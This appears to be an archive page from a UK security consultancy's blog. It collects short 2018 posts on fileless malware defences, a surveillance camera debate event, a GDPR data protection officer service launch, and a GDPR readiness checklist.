From Del Brazil Senior Security Consultant - Advent IM
Simply put Fileless malware is a very well-engineered piece of malware that is very difficult to detect as part of any post incident analysis. It is designed to operate and survive in the memory of systems and as such once a system is re-booted the malware should/could be removed. Sounds pretty easy to defeat or so you’d think as normally any rebooting of a system would generally remove the malware; however there are now versions that write an entry into the registry of the system making the malware more persistent.As with all computer software and hardware there are always unknown vulnerabilities that are there to be exploited by attackers, the trick is finding the vulnerabilities before the attacker and suitably addressing them to prevent an attack; however more often than not a vulnerability is only discovered after an attack has taken place and then it becomes a race to identify a solution and make available to legimate users before attackers conduct multiple attacks on various systems used by everyone and anyone.A prime example of a Fileless malware attack would be one carried out on the Iranian nuclear facility by Stunxnet. The attack was directed towards Microsoft Windows machines using specific software and once a certain set of parameters/measures met the malware would unload its payload causing damage to systems using Microsoft Windows etc.Due to the lack in a file being stored on the target machine/system any forensic examination would have be carried out in a certain manner to ensure that any potential evidence is correctly retained as to follow standard guidelines may erase or at least make it very difficult to recover any useful evidential material.For this reason alone Fileless Malware is very attractive to would be attackers as it can leave little if any trace for standard digital investigative practices.Attackers can develop/program malware to operate in the Powershell scripts where there can execute hidden commands which may render the target machine/system defenceless or even allow unauthorised access to sensitive data.So the big question is, how do we defeat Fileless malware? There is no simple answer but as usual we go back to some basic principles in that systems (hardware/software) need to be updated and maintained in line with manufacturer’s requirements. This will not in any way guarantee to defeat any Fileless malware attack as generally speaking Fileless attacks are exploiting yet undiscovered/undisclosed vulnerabilities; however educating users not to download, install, update or import files, software, images or any other form of file may reduce the likelihood of a piece of Fileless malware being installed and/or executed.Developers should also be required to use a Sandbox environment to avoid any potential infection attacking a live system, this coupled with enforcing the rule of least privilege may reduce the possibility of an attack. Most importantly of all ensure that the use of Powershell or similar programs are strictly controlled and monitored for any unauthorised or unusual activity.
By Ellie Hurst
Posted 23rd February 2018
In data protection, privacy, Question Time, Security, surveillance camera commissioner, Tony Porter
We attended this excellent event and have high hopes there will be more of this kind of frank and open debate in future.From Tony Porter -You never really know if an idea will work. Professor William Webster (Centre for Research Information Surveillance and Privacy) thought that if he "built it people would come". And they did – lots of people!Delivering a commitment made as part of the National Surveillance Camera Strategy (Citizen Engagement strand) we took over a part of London School of Economics, ran a ‘Question Time’ themed event, packed the panel with high profile and compelling people and got the party started. A great turn out ensured a buzz reverberated around the room before the auditorium quietened and the panellists issued their opening position statements.The debate started with a challenging question from the floor - should we have an integrated National CCTV network - harnessing crime, national security and critical national networks with the plethora of other cameras (state owned and private) as they seemingly do in the Middle East? Great question and it certainly got the energy flowing. Mick Barton (Chief Constable of Durham Constabulary) made the point that if that's where society is going he’d rather run a Gîte in France! The panel acknowledged that whilst there would arguably be law enforcement benefits in such an approach the balance between privacy and security would be shifted far too easily and too heavily in the wrong direction as well as being a significant step towards a dystopian society. (I précis!).The debate moved quickly to incorporate subjects such as ANPR, police use of body worn videos, emerging surveillance technologies, an absence of a clear basis in law for their use, regulation, the NHS, domestic CCTV, inappropriate retention of custody images of innocent people by the state and questioned whether CCTV was actually any value to preventing crime. New surveillance technologies featured heavily and Silkie Carlo, Director of Big Brother Watch provided a passionate argument against the use of automated facial recognition cameras in society suggesting that there is no clear basis in law for what are essentially biometric checkpoints and referencing their "Face Off" campaign. Simon Israel (Senior Home Affairs Correspondent for Channel 4 News) focused the debate upon the impact of surveillance on the citizen and wider society.We were grateful for Lord Brian Paddick's presence. He illuminated the room with insights into the passage of the new Data Protection Bill, how GDPR will influence all manner of data processing and also focused on issues of divergence between member European States. We managed to hold onto him for the totality of the debate as he was required back at the House at the end of the event - great effortFinally me - I participated but more importantly I listened. The most important aspect of the evening was to understand the views from the floor, and they were many and varied. I do have access to government and it's important I use that access to influence from a considered and informed perspective. My thanks go to all the panel members, to Professor Webster and to Professor Fussey who facilitated the event and to Mike Gillespie and his team for managing my twitter feed. Most importantly I thank those people who gave up their time and turned up to make up the audience and make the event such a positive experience. A great night and great initial feedback.The Surveillance Camera Commissioner's original blog post here.
By Ellie Hurst
Posted 15th February 2018
In cctv, surveillance camera commissioner, Tony Porter, video surveillance
The Surveillance Camera Commissioner, Tony Porter, is taking part in an important Question Time - style event, next week. If you want to find out more and how to book your FREE place, please go to the Commissioner's blog.
By Ellie Hurst
Posted 15th February 2018
In data protection bill, Data Protection Officer, DPO, GDPR, MyDataProtectinOfficer, press release
**PRESS RELEASE**Media Contact: Ellie Hurst +44 (0) 121 559 6699,email@example.comDate : 15.02.18Advent IM launch MyDataProtectionOfficer, ahead of GDPRThe UK’s leading independent, holistic security consultancy today announced the launch of their data protection advisory service, MyDataProtectionOfficer. This service is a direct response to the GDPR requirement for some businesses and organisations to have a dedicated Data Protection Officer (DPO), but who subsequently discover they cannot resource another employee to meet this requirement, or are simply looking for a more cost effective and agile way to comply.The continued focus on all matters data protection, brought about by the impending GDPR rollout in a few weeks, has meant that many businesses and organisations have been keenly studying the articles and guidance to discover what they need to do to be compliant, or at least what needs to be put in place to ensure they will become compliant. Some of those businesses and organisations will be discovering they need to appoint a DPO and this revelation may have left some perplexed at the additional cost and unsure how they will go about it. Some may still be unsure if this even applies to them.With this potential data protection vacuum in mind, Advent IM, longstanding data protection practitioners, consultants and trainers, have stepped in with an advisory service to satisfy both the need for a DPO under GDPR and the need for the business to manage cost. MyDataProtectionOfficer is designed to meet all the GDPR requirements for a DPO, but instead of a full time employee that requires holiday pay, pension, sick leave etc., the team of data protection experts at your disposal are only chargeable for the time you actually use. With the additional reassurance of more than fifteen years in data protection practice, businesses may actually find they are able to use expertise that may have been outside of the pay scale they could have offered to an employee.Advent IM Director, Julia McCarron said, “We know there has been a lot of confusion and a great deal of fear around GDPR, and many people who have never had to focus a significant amount of time on data protection before are having to do so now. If you meet the criteria for a DPO and have perhaps left it late to work out how to resource one, or you can’t get the level of expertise you need on a budget, or simply don’t feel your business warrants a full-time resource, then MyDataProtectionOfficer is for you. Not only that by with Advent IM’s wider information security expertise and knowledge of implementing standards such as ISO27001, Cyber Essentials and IASME, those using our service benefit from a holistic approach that considers the wider aspects of securing all types of information. What may seem daunting to you, is business as usual to us.”www.advent-im.co.uk/GDPRCloseIssued: 15.02.18 Ends Ref: 0218-Advent-MyDPONOTES TO EDITORSAbout Advent IM Advent IM is an independent specialist consultancy, focusing on holistic security management solutions for information, people and physical assets, across both the public and private sectors. Established in 2002, Advent IM is a centre of excellence for security services, promoting the benefits of best practice guidelines and standards and the need to address risk management to protect against potential threats.From its offices in the Midlands and London, its Consultants work nationwide and are members of the Institute of Information Security Professionals (IISP), The Security Institute (SyI) and British Computer Society.Consultants are also Lead Auditors for the International standard for information security management (ISO 27001)), NCSC Certified Professionals (CCP), Practitioners of PRINCE2, a recognised project management methodology widely used within the public sector, CISSP qualified and Home Office trained physical security assessors.
Test your knowledge of infosec, data protection and GDPR with our crossword! Don't forget you can always look up GDPR for some of the answers or check out the ICO website for help. Answers here tomorrow. pdf versionIf you need help or training with your GDPR preparation, visit our pageor give us a call on 0121 559 6699.
By Ellie Hurst
Posted 16th January 2018
In data protection, GDPR, Metacompliance, Mike Gillespie
Our very own Mike Gillespie will be joining the gang from Metacompliance for their GDPR for Dummies Roadshow. Details of the whole roadshow are availablehere.Mike will be speaking at the Birmingham event. Book now!
DavidCastilloDominiciat FreeDigitalPhotos.netYou cannot fail to have noticed that GDPR is imminent. We thought it might be helpful to offer you a quick look at where you need to be at this stage in the pre-GDPR game.Do you have an information asset register?
does it clearly identify why you collected the personal information?
do you have clearly defined retention schedules in place?
Have you begun to implement Data Protection Privacy Impact Assessments?
Are they properly documented and are risks fully understood?
Hows your privacy statement looking?
Is it clear and unambiguous?
Is your Subject Access Request process clearly signposted?
Are all staff being trained to recognise one and who to pass them onto?
Have you begun to document 'how' you comply with GDPR?Are senior management fully trained and aware of the part they play in ensuring ongoing compliance?Should (when) you be breached can you evidence appropriate security controls were in place?
Do you have an assurance plan to ensure controls remain effective?
Do you have an effective incident reporting and management plan to ensure proper reporting to the correct authorities
Are employees fully versed and trained in this?
Do you document and evidence exercising the plan?
Have you implemented an effective no blame near miss reporting process?
Are near miss stats transparently reported to all staff?
Are you arising results from near miss reporting to tweak your culture?
Remember GDPR isn't a project. It requires a permanent change of culture. You must be investing in quality staff training now.
By Ellie Hurst
Posted 9th January 2018
In business, cyber security infosec, data protection, GDPR